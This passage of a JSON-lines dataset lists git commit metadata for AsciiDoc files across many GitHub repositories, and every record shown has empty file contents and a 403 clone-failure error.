2016-01-01-Dependency-dancing-in-Arch-Linux.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-01-01-Dependency-dancing-in-Arch-Linux.adoc","new_file":"_posts\/2016-01-01-Dependency-dancing-in-Arch-Linux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"907ef9be18e83c1d37e7c06d4198861acd51454a","subject":"feat(doc): move to asciidoc","message":"feat(doc): move to asciidoc\n","repos":"gravitee-io\/gravitee-policy-transform-headers","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-transform-headers.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e254aeea4d31103223bebff7d2e0cdf945c6ed1","subject":"README: Switch recommending Odamex to GZDoom.","message":"README: Switch recommending Odamex to GZDoom.\n\nThe port is now free software and is far more capable than any others\nfor what players will likely want.\n","repos":"CWolfRU\/freedoom,CWolfRU\/freedoom","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CWolfRU\/freedoom.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"5539e7ec620ac5e4b9f8807de2e0fb317e4bba6d","subject":"Update 2016-04-26-Tantalising-Dr-Who-Regenerated-Story-Reveal-for-Kickstarter-Backers.adoc","message":"Update 2016-04-26-Tantalising-Dr-Who-Regenerated-Story-Reveal-for-Kickstarter-Backers.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-04-26-Tantalising-Dr-Who-Regenerated-Story-Reveal-for-Kickstarter-Backers.adoc","new_file":"_posts\/2016-04-26-Tantalising-Dr-Who-Regenerated-Story-Reveal-for-Kickstarter-Backers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ab7f8a5ff54423278047b4fe2280539a5bafdb2","subject":"First draft of READ API added.","message":"First draft of READ API added.\n","repos":"moreati\/u2fval,Yubico\/u2fval","old_file":"doc\/REST_API.adoc","new_file":"doc\/REST_API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moreati\/u2fval.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5e82b7c67b1e6918ae7a444f0fd7b29e68d2a3c8","subject":"y2b create post Boxee Box Unboxing \\u0026 Device Overview","message":"y2b create post Boxee Box Unboxing \\u0026 Device Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-03-Boxee-Box-Unboxing-u0026-Device-Overview.adoc","new_file":"_posts\/2011-01-03-Boxee-Box-Unboxing-u0026-Device-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1ec5b7dd3d6da484adf371115a8b4895a0af150","subject":"Add Manual Page for bitcoinj-cli","message":"Add Manual Page for bitcoinj-cli","repos":"msgilligan\/bitcoinj-addons,msgilligan\/bitcoinj-addons,msgilligan\/bitcoinj-addons,msgilligan\/bitcoinj-addons","old_file":"doc\/manpage-bitcoinj-cli.adoc","new_file":"doc\/manpage-bitcoinj-cli.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msgilligan\/bitcoinj-addons.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"29133cfb1a0f44d9da837c1609bb0671ef1337c2","subject":"LDAP-279: Included reference to samples in documentation.","message":"LDAP-279: Included reference to samples in documentation.\n","repos":"fzilic\/spring-ldap,jaune162\/spring-ldap,ChunPIG\/spring-ldap,n8rogers\/spring-ldap,rwinch\/spring-ldap,likaiwalkman\/spring-ldap,eddumelendez\/spring-ldap,fzilic\/spring-ldap,spring-projects\/spring-ldap,thomasdarimont\/spring-ldap,eddumelendez\/spring-ldap,zion64\/spring-ldap,eddumelendez\/spring-ldap,ChunPIG\/spring-ldap,n8rogers\/spring-ldap,n8rogers\/spring-ldap,wilkinsona\/spring-ldap,ChunPIG\/spring-ldap,rwinch\/spring-ldap,eddumelendez\/spring-ldap,jaune162\/spring-ldap,fzilic\/spring-ldap,rwinch\/spring-ldap,thomasdarimont\/spring-ldap,likaiwalkman\/spring-ldap,rwinch\/spring-ldap,likaiwalkman\/spring-ldap,wilkinsona\/spring-ldap,zion64\/spring-ldap,n8rogers\/spring-ldap,n8rogers\/spring-ldap,thomasdarimont\/spring-ldap,eddumelendez\/spring-ldap,zion64\/spring-ldap,vitorgv\/spring-ldap,eddumelendez\/spring-ldap,thomasdarimont\/spring-ldap,vitorgv\/spring-ldap,rwinch\/spring-ldap,likaiwalkman\/spring-ldap,vitorgv\/spring-ldap,jaune162\/spring-ldap,likaiwalkman\/spring-ldap,jaune162\/spring-ldap,spring-projects\/spring-ldap,jaune162\/spring-ldap,zion64\/spring-ldap,n8rogers\/spring-ldap,spring-projects\/spring-ldap,wilkinsona\/spring-ldap,wilkinsona\/spring-ldap,vitorgv\/spring-ldap,fzilic\/spring-ldap,thomasdarimont\/spring-ldap,jaune162\/spring-ldap,fzilic\/spring-ldap,ChunPIG\/spring-ldap,ChunPIG\/spring-ldap,wilkinsona\/spring-ldap,ChunPIG\/spring-ldap,vitorgv\/spring-ldap,fzilic\/spring-ldap,spring-projects\/spring-ldap,zion64\/spring-ldap,thomasdarimont\/spring-ldap,rwinch\/spring-ldap,likaiwalkman\/spring-ldap,spring-projects\/spring-ldap","old_file":"src\/asciidoc\/index.adoc","new_file":"src\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rwinch\/spring-ldap.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a31f88ecd0ec0aedeb43de56b2db03b4a6fc0a33","subject":"- Start doc for server\/database environment tags","message":"- Start doc for server\/database environment tags\n","repos":"davidwatkins73\/waltz-dev,kamransaleem\/waltz,khartec\/waltz,davidwatkins73\/waltz-dev,davidwatkins73\/waltz-dev,davidwatkins73\/waltz-dev,kamransaleem\/waltz,kamransaleem\/waltz,kamransaleem\/waltz,khartec\/waltz,khartec\/waltz,khartec\/waltz","old_file":"docs\/design\/draft\/app_environments\/app_environment.adoc","new_file":"docs\/design\/draft\/app_environments\/app_environment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/khartec\/waltz.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8c75e3b73dbea72e0ddaec3d5a54237781273af1","subject":"made some changes to week6","message":"made some changes to week6\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week06.asciidoc","new_file":"asciidoc\/week06.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5e1119ec008716e3f02ebfefaf12117043fb9596","subject":"Update 2015-03-05-Communicating-with-the-backend-using-dollarhttp-service-in-Angularjs.adoc","message":"Update 2015-03-05-Communicating-with-the-backend-using-dollarhttp-service-in-Angularjs.adoc","repos":"devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io","old_file":"_posts\/2015-03-05-Communicating-with-the-backend-using-dollarhttp-service-in-Angularjs.adoc","new_file":"_posts\/2015-03-05-Communicating-with-the-backend-using-dollarhttp-service-in-Angularjs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devkamboj\/devkamboj.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5efdfc72a31ea7a55fe506edf72c3c2bed1555c8","subject":"","message":"\n\nMinor edit","repos":"pcu-consortium\/pcu-consortium.github.io,pcu-consortium\/pcu-consortium.github.io,pcu-consortium\/pcu-consortium.github.io,pcu-consortium\/pcu-consortium.github.io","old_file":"_posts\/2017-07-24 Introduction-to-Filebeat.adoc","new_file":"_posts\/2017-07-24 Introduction-to-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pcu-consortium\/pcu-consortium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"43b8846304fa5583b081636d9a65578569a78355","subject":"Create common-grailsApplicationForge5.adoc","message":"Create common-grailsApplicationForge5.adoc","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-grailsApplicationForge5.adoc","new_file":"src\/main\/docs\/common-grailsApplicationForge5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"41baba66314a68601c30b9169b8d47a8ffcd9aee","subject":"y2b create post The best iPad case on the market?","message":"y2b create post The best iPad case on the market?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-03-27-The-best-iPad-case-on-the-market.adoc","new_file":"_posts\/2013-03-27-The-best-iPad-case-on-the-market.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f995b7f5c037166e7b029fd367583e3b14fbfaf9","subject":"Update 2018-03-27-Blockchain-Design-considerations.adoc","message":"Update 2018-03-27-Blockchain-Design-considerations.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-03-27-Blockchain-Design-considerations.adoc","new_file":"_posts\/2018-03-27-Blockchain-Design-considerations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74ae984757c49ee2507e53774966b3d64c364a37","subject":"y2b create post New Macbook Air Giveaway! [OPEN]","message":"y2b create post New Macbook Air Giveaway! [OPEN]","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-23-New-Macbook-Air-Giveaway-OPEN.adoc","new_file":"_posts\/2013-05-23-New-Macbook-Air-Giveaway-OPEN.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c618eb607defdb5ce7edf3a82971de0d242eee7c","subject":"Update 2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-16-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7bc8bcfe4852e8f1ffbeb082b269162520a4d3e","subject":"y2b create post Your Whole Wallet In One Card","message":"y2b create post Your Whole Wallet In One Card","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-03-Your-Whole-Wallet-In-One-Card.adoc","new_file":"_posts\/2017-06-03-Your-Whole-Wallet-In-One-Card.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4afa557ceffe85346b5a2922ec7424cd3f308c8","subject":"y2b create post You Wish You Got THIS For Christmas...","message":"y2b create post You Wish You Got THIS For Christmas...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-25-YouWishYouGotTHISForChristmas.adoc","new_file":"_posts\/2017-12-25-YouWishYouGotTHISForChristmas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b6be836e7688a45e550041802bc120dded5aec3","subject":"Update 2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","message":"Update 2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","new_file":"_posts\/2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d192b1c123be90656e34330ddf4fac176de0a2e","subject":"Update 2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","message":"Update 2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_file":"_posts\/2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c55c33e261b07c1265b6bfb66e49b1cb583e48f0","subject":"endpoint","message":"endpoint\n","repos":"Kronos-Integration\/kronos-service-manager","old_file":"doc\/endpoints.adoc","new_file":"doc\/endpoints.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kronos-Integration\/kronos-service-manager.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"0ab6ac75ec29112f03f34e74d40b9766327396f9","subject":"Update 2016-04-29-Alone.adoc","message":"Update 2016-04-29-Alone.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2016-04-29-Alone.adoc","new_file":"_posts\/2016-04-29-Alone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5466cec5a06606f5044e87f09fa3b21fd60b330b","subject":"The task for the second lab","message":"The task for the second lab\n","repos":"slbedu\/javase8-2016","old_file":"lab02\/README.adoc","new_file":"lab02\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/slbedu\/javase8-2016.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4dcc98c89e70f4b0d1f11986251cd957cdf06871","subject":"Update 2015-10-21-Movendo-um-repositorio-do-Bit-Bucket-para-o-Git-Hub-ou-vice-versa.adoc","message":"Update 2015-10-21-Movendo-um-repositorio-do-Bit-Bucket-para-o-Git-Hub-ou-vice-versa.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2015-10-21-Movendo-um-repositorio-do-Bit-Bucket-para-o-Git-Hub-ou-vice-versa.adoc","new_file":"_posts\/2015-10-21-Movendo-um-repositorio-do-Bit-Bucket-para-o-Git-Hub-ou-vice-versa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b89e06d30ecfd3d309595deca0d5db01af11d02","subject":"Update 2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","message":"Update 2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","repos":"AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog","old_file":"_posts\/2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","new_file":"_posts\/2016-02-29-Meine-ersten-Schritte-mit-dem-Hubpress-Blog-via-Git-Hub-Repository.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexL777\/hubpressblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f4496d6c6c967cd1ac55669b0210937412a238a","subject":"Update 2016-06-11-Folding-the-Universe-part-I.adoc","message":"Update 2016-06-11-Folding-the-Universe-part-I.adoc","repos":"pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io","old_file":"_posts\/2016-06-11-Folding-the-Universe-part-I.adoc","new_file":"_posts\/2016-06-11-Folding-the-Universe-part-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysaumont\/pysaumont.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4a1715ab297d7fc33c0d7f654d86dbb2e7ff51f","subject":"added Readme for Dockerfile explanation (#26)","message":"added Readme for Dockerfile explanation (#26)\n\n","repos":"droolsjbpm\/jbpm-website,droolsjbpm\/jbpm-website,droolsjbpm\/jbpm-website,droolsjbpm\/jbpm-website","old_file":"_dockerPublisher\/ReadMe_automaticPublishing.adoc","new_file":"_dockerPublisher\/ReadMe_automaticPublishing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/droolsjbpm\/jbpm-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e4ef49ec520368d866fb38fc53e2f4b955d0b63f","subject":"Create README.adoc","message":"Create README.adoc","repos":"twister2016\/twister,twister2016\/twister,twister2016\/twister,twister2016\/twister","old_file":"examples\/arp\/README.adoc","new_file":"examples\/arp\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/twister2016\/twister.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ed714b01cf86a396520c64eff1579c3340426578","subject":"add alpha8 note","message":"add alpha8 note","repos":"lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/quick-start.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/quick-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5fc6e029b2ab4734ef1bac7c5f6e016bcba4a39d","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b3378f7a01de879fd4a964cae0fad1fadd37653","subject":"Update 2017-03-03-mark-read-all-by-Google-Extension.adoc","message":"Update 2017-03-03-mark-read-all-by-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-03-mark-read-all-by-Google-Extension.adoc","new_file":"_posts\/2017-03-03-mark-read-all-by-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b23316774b091f96d569f5b0c460422112489e5","subject":"Update 2018-11-11-1.adoc","message":"Update 2018-11-11-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-1.adoc","new_file":"_posts\/2018-11-11-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d2061dc3fef29ce20c3b41686c1546ad8f03375","subject":"Worked on Systemd journal file format","message":"Worked on Systemd journal file format\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/Systemd journal file format.asciidoc","new_file":"documentation\/Systemd journal file format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8c3342874f23a0ebc0f94b82f927c1adb22cebcd","subject":"update project","message":"update project\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"various\/example-rpc\/readme.adoc","new_file":"various\/example-rpc\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0108ce31ab45cc2d42f4b27eb3fa09f66de9483","subject":"RFD77: change to ECDH for encryption at rest key derivation","message":"RFD77: change to ECDH for encryption at rest key derivation\n","repos":"joyent\/rfd,davepacheco\/rfd,joyent\/rfd,melloc\/rfd,melloc\/rfd,davepacheco\/rfd,davepacheco\/rfd,joyent\/rfd,davepacheco\/rfd,melloc\/rfd,davepacheco\/rfd,joyent\/rfd","old_file":"rfd\/0077\/README.adoc","new_file":"rfd\/0077\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joyent\/rfd.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"8b7326c2f6828f6d33a94cb6a2ab113ffe772f5b","subject":"RFD 77: the saga continues","message":"RFD 77: the saga continues\n","repos":"joyent\/rfd,joyent\/rfd,davepacheco\/rfd,melloc\/rfd,joyent\/rfd,davepacheco\/rfd,melloc\/rfd,davepacheco\/rfd,davepacheco\/rfd,melloc\/rfd,joyent\/rfd,davepacheco\/rfd","old_file":"rfd\/0077\/README.adoc","new_file":"rfd\/0077\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joyent\/rfd.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"fcc23352b68a29c4b5461c77a296cf14f933e9ed","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01a7fab551f697b21108d511853e91cb27d96ff0","subject":"Update 2018-03-24-How-to-get-freelancer-work-for-you-for-free.adoc","message":"Update 2018-03-24-How-to-get-freelancer-work-for-you-for-free.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2018-03-24-How-to-get-freelancer-work-for-you-for-free.adoc","new_file":"_posts\/2018-03-24-How-to-get-freelancer-work-for-you-for-free.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82d49e32a0fa8774244627b74f8e66f093b06e2e","subject":"Finished with the user guide conversion","message":"Finished with the user guide conversion\n\ngit-svn-id: 10bc45916fe30ae642aa5037c9a4b05727bba413@1844883 13f79535-47bb-0310-9956-ffa450edef68\n","repos":"apache\/wss4j,apache\/wss4j","old_file":"src\/site\/asciidoc\/config.adoc","new_file":"src\/site\/asciidoc\/config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/wss4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"18adbafc69ad632830543de1a89bf557c1178526","subject":"Links corr Objects","message":"Links corr Objects\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Objects & interfaces\/README.adoc","new_file":"Objects & interfaces\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"349be46fc016200c0cf6e2df98e2034887d76f50","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6b9e6968102e6bbdae6e894eb2973486fab4536","subject":"Update 2017-06-02-Azure-4.adoc","message":"Update 